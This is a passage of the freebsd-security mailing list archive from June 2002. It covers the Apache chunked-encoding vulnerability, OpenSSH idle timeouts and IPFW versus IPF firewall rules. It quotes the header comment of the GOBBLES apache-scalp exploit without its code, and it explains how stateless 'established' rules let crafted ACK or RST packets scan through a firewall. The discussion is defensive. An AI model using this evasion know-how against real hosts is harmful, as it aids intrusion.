Thu, 20 Jun 2002 15:15:10 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5KKF9Gs056320; Thu, 20 Jun 2002 15:15:09 -0500 (CDT) Date: Thu, 20 Jun 2002 15:15:09 -0500 From: "Jacques A. Vidrine" To: "David G . Andersen" Cc: Jeff Gentry , freebsd-security@FreeBSD.ORG Subject: Re: Apache root exploitable? Message-ID: <20020620201509.GC56227@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , "David G . Andersen" , Jeff Gentry , freebsd-security@FreeBSD.ORG References: <20020620154453.L76822-100000@hellfire.hexdump.org> <20020620134143.C14099@cs.utah.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020620134143.C14099@cs.utah.edu> User-Agent: Mutt/1.3.99i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 20, 2002 at 01:41:43PM -0600, David G . Andersen wrote: > > It's not _root_ exploitable unless you run Apache as root. > > If you do that, you're asking for it anyway. > > It may or may not be remotely exploitable. It looks a lot more > exploitable than it did a few days ago. :) David is on the money. We've yet to confirm that the bug can be exploited for arbitrary code execution, but GOBBLES's post (and se@FreeBSD.org's follow-up) do have us worried still. Assume that it can be exploited, and upgrade as soon as you can. After all, even if it is `only' a DoS, it will probably get hit a lot once someone writes a Code Red-like worm for the Win32 version. History tells us that such worms don't bother to check the operating system or version that is running before attacking, and I would expect apache < 1.3.26 servers to experience a lot of downtime as a result. :-) Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 13:18:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from hellfire.hexdump.org (h006097e24f05.ne.client2.attbi.com [24.62.157.118]) by hub.freebsd.org (Postfix) with ESMTP id ED51C37B40F for ; Thu, 20 Jun 2002 13:18:26 -0700 (PDT) Received: from hellfire.hexdump.org (localhost [127.0.0.1]) by hellfire.hexdump.org (8.12.2/8.12.2) with ESMTP id g5KKPU1T077021; Thu, 20 Jun 2002 16:25:30 -0400 (EDT) (envelope-from freebsd@hexdump.org) Received: from localhost (freebsd@localhost) by hellfire.hexdump.org (8.12.2/8.12.2/Submit) with ESMTP id g5KKPT0p077018; Thu, 20 Jun 2002 16:25:30 -0400 (EDT) Date: Thu, 20 Jun 2002 16:25:29 -0400 (EDT) From: Jeff Gentry To: "David G . Andersen" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache root exploitable? In-Reply-To: <20020620134143.C14099@cs.utah.edu> Message-ID: <20020620162448.V77014-100000@hellfire.hexdump.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > It's not _root_ exploitable unless you run Apache as root. > If you do that, you're asking for it anyway. Nope :) While I mind DoS exploits, having ppl finding their way into my system is even more bothersome, especially if there is no workaround available, but ... > Upgrade to 1.3.26 or 2.0.39. Gotcha. Thanks. -J To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 13:28:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from alive.znep.com (sense-sea-MegaSub-1-448.oz.net [216.39.145.194]) by hub.freebsd.org (Postfix) with ESMTP id 10AAE37B407; Thu, 20 Jun 2002 13:28:20 -0700 (PDT) Received: from localhost (marcs@localhost) by alive.znep.com (8.9.3/8.9.3) with ESMTP id NAA53662; Thu, 20 Jun 2002 13:28:19 -0700 (PDT) (envelope-from marcs@znep.com) Date: Thu, 20 Jun 2002 13:28:18 -0700 (PDT) From: Marc Slemko To: "Jacques A. Vidrine" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache root exploitable? In-Reply-To: <20020620201509.GC56227@madman.nectar.cc> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 20 Jun 2002, Jacques A. Vidrine wrote: > On Thu, Jun 20, 2002 at 01:41:43PM -0600, David G . Andersen wrote: > > > > It's not _root_ exploitable unless you run Apache as root. > > > > If you do that, you're asking for it anyway. > > > > It may or may not be remotely exploitable. It looks a lot more > > exploitable than it did a few days ago. :) > > David is on the money. We've yet to confirm that the bug can be > exploited for arbitrary code execution, but GOBBLES's post (and > se@FreeBSD.org's follow-up) do have us worried still. Yes, I have every reason to think it is exploitable for remote code execution. > After all, even if it is `only' a DoS, it will probably get hit a > lot once someone writes a Code Red-like worm for the Win32 version. > History tells us that such worms don't bother to check the operating > system or version that is running before attacking, and I would expect > apache < 1.3.26 servers to experience a lot of downtime as a result. > :-) It isn't a very serious DoS though. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 13:32:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 48B9637B407 for ; Thu, 20 Jun 2002 13:32:13 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id CF545D; Thu, 20 Jun 2002 15:32:12 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5KKWCJI056455; Thu, 20 Jun 2002 15:32:12 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5KKWC30056454; Thu, 20 Jun 2002 15:32:12 -0500 (CDT) Date: Thu, 20 Jun 2002 15:32:12 -0500 From: "Jacques A. Vidrine" To: Marc Slemko Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache root exploitable? Message-ID: <20020620203212.GA56421@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Marc Slemko , freebsd-security@FreeBSD.ORG References: <20020620201509.GC56227@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.99i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 20, 2002 at 01:28:18PM -0700, Marc Slemko wrote: > > After all, even if it is `only' a DoS, it will probably get hit a > > lot once someone writes a Code Red-like worm for the Win32 version. > > History tells us that such worms don't bother to check the operating > > system or version that is running before attacking, and I would expect > > apache < 1.3.26 servers to experience a lot of downtime as a result. > > :-) > > It isn't a very serious DoS though. Code Red and friends didn't even tickle a bug (in non-Microsoft servers), yet choked many non-Microsoft down due to the sheer number of requests. A `Code Red for Win32 Apache Chunking' would probably not spread as much (unless there is way more Win32 Apache than I think), but the number of requests generated could still be large --- and have special impact on Apache < 1.3.26 servers. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 13:53:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from alive.znep.com (sense-sea-MegaSub-1-448.oz.net [216.39.145.194]) by hub.freebsd.org (Postfix) with ESMTP id 4593137B400; Thu, 20 Jun 2002 13:53:29 -0700 (PDT) Received: from localhost (marcs@localhost) by alive.znep.com (8.9.3/8.9.3) with ESMTP id NAA53955; Thu, 20 Jun 2002 13:53:28 -0700 (PDT) (envelope-from marcs@znep.com) Date: Thu, 20 Jun 2002 13:53:28 -0700 (PDT) From: Marc Slemko To: "Jacques A. Vidrine" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache root exploitable? In-Reply-To: <20020620203212.GA56421@madman.nectar.cc> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 20 Jun 2002, Jacques A. Vidrine wrote: > On Thu, Jun 20, 2002 at 01:28:18PM -0700, Marc Slemko wrote: > > > After all, even if it is `only' a DoS, it will probably get hit a > > > lot once someone writes a Code Red-like worm for the Win32 version. > > > History tells us that such worms don't bother to check the operating > > > system or version that is running before attacking, and I would expect > > > apache < 1.3.26 servers to experience a lot of downtime as a result. > > > :-) > > > > It isn't a very serious DoS though. > > Code Red and friends didn't even tickle a bug (in non-Microsoft > servers), yet choked many non-Microsoft down due to the sheer number > of requests. The vast majority of servers were not seriously impacted. Ones with large numbers of IP based virutal hosts were hit harder, but the typical server really wasn't impacted other than all the admins sending all sorts of mail to mailing lists saying "help me help me I'm under attack". > A `Code Red for Win32 Apache Chunking' would probably > not spread as much (unless there is way more Win32 Apache than I > think), but the number of requests generated could still be large --- > and have special impact on Apache < 1.3.26 servers. The bug can be exploited on various Unix platforms as well. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 14: 1:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from munkboxen.mine.nu (213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by hub.freebsd.org (Postfix) with ESMTP id B3F6C37B412 for ; Thu, 20 Jun 2002 14:00:36 -0700 (PDT) Received: (from munk@localhost) by munkboxen.mine.nu (8.11.6/8.11.6) id g5KKxMO38657 for freebsd-security@FreeBSD.ORG; Thu, 20 Jun 2002 21:59:22 +0100 (BST) (envelope-from munk) Date: Thu, 20 Jun 2002 21:59:22 +0100 From: Jez Hancock To: freebsd-security@FreeBSD.ORG Subject: Re: Apache root exploitable? Message-ID: <20020620215922.A32355@munkboxen.mine.nu> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20020620154453.L76822-100000@hellfire.hexdump.org> <20020620134143.C14099@cs.utah.edu> <20020620201509.GC56227@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020620201509.GC56227@madman.nectar.cc>; from nectar@FreeBSD.ORG on Thu, Jun 20, 2002 at 03:15:09PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 20, 2002 at 03:15:09PM -0500, Jacques A. Vidrine wrote: > David is on the money. We've yet to confirm that the bug can be > exploited for arbitrary code execution, but GOBBLES's post (and > se@FreeBSD.org's follow-up) do have us worried still. In my experience, it has been confirmed/checked to work on OpenBSD 3.0. An associate tested the exploit code submitted by GOBBLES and as it says on the tin, it does lead to a buffer overflow in OpenBSD (certainly 3.0). The exploit header bullsh^H^H^H^H^Hlurb below however is some cause for concern, stating that the exploit is indeed applicable to FreeBSD 4.3-4.5. In my experience this is not the case running FreeBSD4.4 Apache 1.3.20, but perhaps the author of the vulnerability would like to comment on this. I am a mere mortal and do not claim to have ever understood the finer details of bof and such. :) * apache-scalp.c * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! * * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to * The "experts" have already concurred that this bug... * - Can not be exploited on 32-bit *nix variants * - Is only exploitable on win32 platforms * - Is only exploitable on certain 64-bit systems * * However, contrary to what ISS would have you believe, we have * successfully exploited this hole on the following operating systems: * * Sun Solaris 6-8 (sparc/x86) * FreeBSD 4.3-4.5 (x86) * OpenBSD 2.6-3.1 (x86) * Linux (GNU) 2.4 (x86) * < * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel * bugs are great. * * [#!GOBBLES QUOTES] In any event, what Jaques most eminently points out: > Assume that it can be exploited, and upgrade as soon as you can. > > After all, even if it is `only' a DoS, it will probably get hit a > lot once someone writes a Code Red-like worm for the Win32 version. > History tells us that such worms don't bother to check the operating > system or version that is running before attacking, and I would expect > apache < 1.3.26 servers to experience a lot of downtime as a result. > :-) Best Regards, Jez -- Windows: "Where do you want to go today?" Linux: "Where do you want to go tomorrow?" FreeBSD: "Are you guys coming, or what?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 14:45:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10101.mail.yahoo.com (web10101.mail.yahoo.com [216.136.130.51]) by hub.freebsd.org (Postfix) with SMTP id A57C337B404 for ; Thu, 20 Jun 2002 14:45:12 -0700 (PDT) Message-ID: <20020620214512.42806.qmail@web10101.mail.yahoo.com> Received: from [68.5.49.41] by web10101.mail.yahoo.com via HTTP; Thu, 20 Jun 2002 14:45:12 PDT Date: Thu, 20 Jun 2002 14:45:12 -0700 (PDT) From: twig les Subject: SSH timeout settings To: freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hey all, I think this is an easy one masquerading as a tough one.... My OpenSSH on my Free 4.4 Release box just lets me keep an open session indefinitely without any activity. I've read man sshd and all sorts of other things but no mention. So the short version is: where do I lower the timeout of SSH? Thanks for anything... ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 14:48:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id ED65B37B40E for ; Thu, 20 Jun 2002 14:48:24 -0700 (PDT) Received: from famine.cs.utah.edu (famine.cs.utah.edu [155.99.198.114]) by wrath.cs.utah.edu (8.11.6/8.11.6) with ESMTP id g5KLmO127359; Thu, 20 Jun 2002 15:48:24 -0600 (MDT) Received: by famine.cs.utah.edu (Postfix, from userid 2146) id C55B823AA2; Thu, 20 Jun 2002 15:48:23 -0600 (MDT) Date: Thu, 20 Jun 2002 15:48:23 -0600 From: "David G . Andersen" To: Jez Hancock Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache root exploitable? Message-ID: <20020620154823.E14099@cs.utah.edu> References: <20020620154453.L76822-100000@hellfire.hexdump.org> <20020620134143.C14099@cs.utah.edu> <20020620201509.GC56227@madman.nectar.cc> <20020620215922.A32355@munkboxen.mine.nu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20020620215922.A32355@munkboxen.mine.nu>; from jez.hancock@munkboxen.mine.nu on Thu, Jun 20, 2002 at 09:59:22PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jez Hancock just mooed: > On Thu, Jun 20, 2002 at 03:15:09PM -0500, Jacques A. Vidrine wrote: > > David is on the money. We've yet to confirm that the bug can be > > exploited for arbitrary code execution, but GOBBLES's post (and > > se@FreeBSD.org's follow-up) do have us worried still. > In my experience, it has been confirmed/checked to work on OpenBSD 3.0. > > An associate tested the exploit code submitted by GOBBLES and as it says > on the tin, it does lead to a buffer overflow in OpenBSD (certainly > 3.0). That's enough confirmation for me, IMHO. :-) > The exploit header bullsh^H^H^H^H^Hlurb below however is some cause for > concern, stating that the exploit is indeed applicable to FreeBSD > 4.3-4.5. In my experience this is not the case running FreeBSD4.4 > Apache 1.3.20, but perhaps the author of the vulnerability would like to > comment on this. I am a mere mortal and do not claim to have ever > understood the finer details of bof and such. :) You're misunderstanding the text in their message. They claim that the bug is exploit_able_ on OpenBSD, FreeBSD, Solaris, and Linux -- but they say that the exploit they've published is only for OpenBSD. -Dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 15:23:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from hermes.epita.fr (hermes.epita.fr [163.5.255.10]) by hub.freebsd.org (Postfix) with ESMTP id 2804537B40E for ; Thu, 20 Jun 2002 15:23:07 -0700 (PDT) Received: from rocco (rocco [10.42.14.9]) by hermes.epita.fr id g5KMMtu09851 Fri, 21 Jun 2002 00:22:55 +0200 (MEST) Date: Fri, 21 Jun 2002 00:22:54 +0200 From: jeremie le-hen To: twig les Cc: freebsd-security@freebsd.org Subject: Re: SSH timeout settings Message-ID: <20020621002254.B21286@rocco.epita.fr> References: <20020620214512.42806.qmail@web10101.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020620214512.42806.qmail@web10101.mail.yahoo.com>; from twigles@yahoo.com on Thu, Jun 20, 2002 at 02:45:12PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Hey all, I think this is an easy one masquerading as a > tough one.... My OpenSSH on my Free 4.4 Release box > just lets me keep an open session indefinitely without > any activity. I've read man sshd and all sorts of > other things but no mention. > > So the short version is: where do I lower the timeout > of SSH? These two options from sshd(8) manual page may help you (grabbed from my 4.6-REALSE box -- "sshd version OpenSSH_2.9 FreeBSD localisations 20020307") : ClientAliveInterval Sets a timeout interval in seconds after which if no data has been received from the client, sshd will send a message through the encrypted channel to request a response from the client. The default is 0, indicating that these messages will not be sent to the client. This option applies to protocol version 2 only. KeepAlive Specifies whether the system should send keepalive messages to the other side. If they are sent, death of the connection or crash of one of the machines will be properly noticed. However, this means that connections will die if the route is down tem- porarily, and some people find it annoying. On the other hand, if keepalives are not sent, sessions may hang indefinitely on the server, leaving ``ghost'' users and consuming server resources. The default is ``yes'' (to send keepalives), and the server will notice if the network goes down or the client host reboots. This avoids infinitely hanging sessions. To disable keepalives, the value should be set to ``no'' in both the server and the client configuration files. -- Jeremie aka TataZ le-hen_j@epita.fr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 15:46:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10102.mail.yahoo.com (web10102.mail.yahoo.com [216.136.130.52]) by hub.freebsd.org (Postfix) with SMTP id 1573A37B403 for ; Thu, 20 Jun 2002 15:46:33 -0700 (PDT) Message-ID: <20020620224632.62118.qmail@web10102.mail.yahoo.com> Received: from [68.5.49.41] by web10102.mail.yahoo.com via HTTP; Thu, 20 Jun 2002 15:46:32 PDT Date: Thu, 20 Jun 2002 15:46:32 -0700 (PDT) From: twig les Subject: Re: SSH timeout settings To: jeremie le-hen Cc: freebsd-security@freebsd.org In-Reply-To: <20020621002254.B21286@rocco.epita.fr> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well I don't have the ClientAliveInterval option in my version of SSH (the one default installed in 4.4 release, not sure how to upgrade since pkg_info doesn't mention SSH) and the KeepAlive option isn't exactly what I'm looking for. BTW, under the ClientAliveInterval I noticed that it doesn't say that the server will kill the session if the client doesn't respond with activity (not just a connectivity test, I'm looking for activity). --- jeremie le-hen wrote: > > Hey all, I think this is an easy one masquerading > as a > > tough one.... My OpenSSH on my Free 4.4 Release > box > > just lets me keep an open session indefinitely > without > > any activity. I've read man sshd and all sorts of > > other things but no mention. > > > > So the short version is: where do I lower the > timeout > > of SSH? > > These two options from sshd(8) manual page may help > you (grabbed from my > 4.6-REALSE box -- "sshd version OpenSSH_2.9 FreeBSD > localisations 20020307") : > > ClientAliveInterval > Sets a timeout interval in seconds > after which if no data has > been received from the client, sshd > will send a message through > the encrypted channel to request a > response from the client. The > default is 0, indicating that these > messages will not be sent to > the client. This option applies to > protocol version 2 only. > > KeepAlive > Specifies whether the system should > send keepalive messages to > the other side. If they are sent, > death of the connection or > crash of one of the machines will be > properly noticed. However, > this means that connections will die if > the route is down tem- > porarily, and some people find it > annoying. On the other hand, > if keepalives are not sent, sessions > may hang indefinitely on the > server, leaving ``ghost'' users and > consuming server resources. > > The default is ``yes'' (to send > keepalives), and the server will > notice if the network goes down or the > client host reboots. This > avoids infinitely hanging sessions. > > To disable keepalives, the value should > be set to ``no'' in both > the server and the client configuration > files. > > -- > Jeremie aka TataZ > le-hen_j@epita.fr > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 16:11:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 26C6637B409 for ; Thu, 20 Jun 2002 16:11:17 -0700 (PDT) Received: (qmail 24813 invoked by uid 1000); 20 Jun 2002 23:11:11 -0000 Date: Thu, 20 Jun 2002 17:11:11 -0600 From: "Dalin S. Owen" To: freebsd-security@freebsd.org Subject: IPFW/IPF Setup/Established Message-ID: <20020620171111.A24480@nexusxi.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="W/nzBZO5zC0uMSeA" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --W/nzBZO5zC0uMSeA Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable First an example: :) ipfw add 9 allow tcp from any to any established ipfw add 10 allow tcp from any to 10.0.0.2 80 setup (DEFAULT DENY RULE) vs. block in all block out all pass in quick on fxp0 proto tcp from any to 10.0.0.2 port =3D 80 flags S ke= ep state These two rule snippets do essentialy the same thing, I know one of them is= stateful, and the other is not. =20 It is kind of like comparing apples to oranges... but they behave the same = in the end. They both check for a=20 SYN, and keep a (virtual) state. I have heard from the IPF community that a "allow tcp from any to any estab= lished" can be spoofed. Don't=20 they need the right sequence number to do that? I mean, to send packets to= my machine "claiming" to already=20 be established to a private port? If so, then why is the /etc/rc.firewall = script written this way? There=20 must be a reason. Also, Which one is faster at matching packets on average? Help me end the ipfw + ipf madness!!?!? :) Insanely yours, Dalin S. Owen --W/nzBZO5zC0uMSeA Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAj0SYQ4ACgkQKZhyFXMVXuIkCQCfRKIEXBEGFZucalbIyuCguDrG lPQAoLlyUFOXFYUEHFh7rOg3Zg8/8rr0 =h7D9 -----END PGP SIGNATURE----- --W/nzBZO5zC0uMSeA-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 16:17:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from flamingo.mail.pas.earthlink.net (flamingo.mail.pas.earthlink.net [207.217.120.232]) by hub.freebsd.org (Postfix) with ESMTP id 757C637B407 for ; Thu, 20 Jun 2002 16:17:04 -0700 (PDT) Received: from user-38ldms6.dialup.mindspring.com ([209.86.219.134] helo=earthlink.net) by flamingo.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17LBAb-0001rY-00; Thu, 20 Jun 2002 16:16:54 -0700 Message-ID: <3D126270.5050604@earthlink.net> Date: Thu, 20 Jun 2002 16:17:04 -0700 From: Lawrence Sica User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Klaus Steden Cc: Maxlor , "freebsd-security@FreeBSD.ORG" Subject: Re: preventing tampering with tripwire References: <27700541.1024450071@[10.0.0.16]> <2799555.1024487443@[10.0.0.16]> <20020620011704.G589@cthulu.compt.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Klaus Steden wrote: >>Putting the tripwire binary on an external, read only drive doesn't help. >>As I mentioned, an attacker who gained root could simply unmount the disk >>and place a tampered copy into the mountpoint dir. I would only notice this >>if I happened to have a closer look at df *and* the attacker was nice >>enough not to modify df too. >> http://www.phrack.org/show.php?p=51&a=9 The above url is a decent article about ways to bypass systems. Sure it's from 1997, but it still has good insights and information. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 16:47:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail1.infospace.com (mail1.infospace.com [206.29.197.87]) by hub.freebsd.org (Postfix) with SMTP id 401C937B40D for ; Thu, 20 Jun 2002 16:47:07 -0700 (PDT) Received: (qmail 31544 invoked from network); 20 Jun 2002 23:46:58 -0000 Received: from unknown (HELO ketel.inspinc.ad) (10.100.11.49) by jim.inspinc.ad with SMTP; 20 Jun 2002 23:46:57 -0000 Received: (qmail 4082 invoked from network); 20 Jun 2002 23:46:57 -0000 Received: from unknown (HELO ?10.99.33.65?) ([10.100.29.130]) (envelope-sender ) by ketel.inspinc.ad (qmail-ldap-1.03) with SMTP for ; 20 Jun 2002 23:46:57 -0000 User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Thu, 20 Jun 2002 16:46:56 -0700 Subject: Re: IPFW/IPF Setup/Established From: William Carrel To: "Dalin S. Owen" , Message-ID: In-Reply-To: <20020620171111.A24480@nexusxi.com> Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 6/20/02 4:11 PM, "Dalin S. Owen" wrote: > ipfw add 9 allow tcp from any to any established > ipfw add 10 allow tcp from any to 10.0.0.2 80 setup > (DEFAULT DENY RULE) > > vs. > > block in all > block out all > pass in quick on fxp0 proto tcp from any to 10.0.0.2 port = 80 flags S keep > state > > These two rule snippets do essentialy the same thing, I know one of them is > stateful, and the other is not. > It is kind of like comparing apples to oranges... but they behave the same in > the end. They both check for a > SYN, and keep a (virtual) state. Not quite. A more interesting example above would be if the ipf snippet did "block return-rst in proto tcp all". Then you would see a big difference in behavior of scanners, particularly those doing a non-SYN scan. They would get RST's on every single port with the ipf code, while the ipfw code would let every scanned packet and response through. (This, of course, is not to say that you can't get ipfw to return RST's on all those ports in a similar situation, but you certainly don't do it with "setup" and "established" The "established" and "setup" keywords essentially mean anything with RST or ACK and anything with SYN but not ACK respectively. One could quite easily scan through a firewall setup this way by sending packets that look like they are part of an established session. With these ipfw keywords there is *absolutely no state keeping of any sort*. There are ways to keep state with ipfw, inquire in your local manpages. It's also worth noting that you may want something different than flags S there in your ipf thingy... check the ipf-howto for reasons why. > I have heard from the IPF community that a "allow tcp from any to any > established" can be spoofed. Don't they need the right sequence number to do > that? I mean, to send packets to my machine "claiming" to already > be established to a private port? No, as I briefly explained above. "established" and "setup" do no state keeping whatsoever. They simply look at the TCP flags which can be set any which way by a malicious transmitter. They don't care what the sequence number is at all. As long as they have RST or ACK set, they get through. Think of those keywords as short hand for tcpflags ack (or rst) and tcpflags syn,!ack. > If so, then why is the /etc/rc.firewall > script written this way? There must be a reason. Also, Which one is faster > at matching packets on average? It depends heavily on the ruleset I imagine. Search the list archives for various discussions/flamefests about which is better. -- William Carrel | Sr. Systems Engineer | william.carrel@infospace.com InfoSpace INC 601 108th Ave NE | Suite 1200 | Bellevue, WA 98004 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 17:42:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com 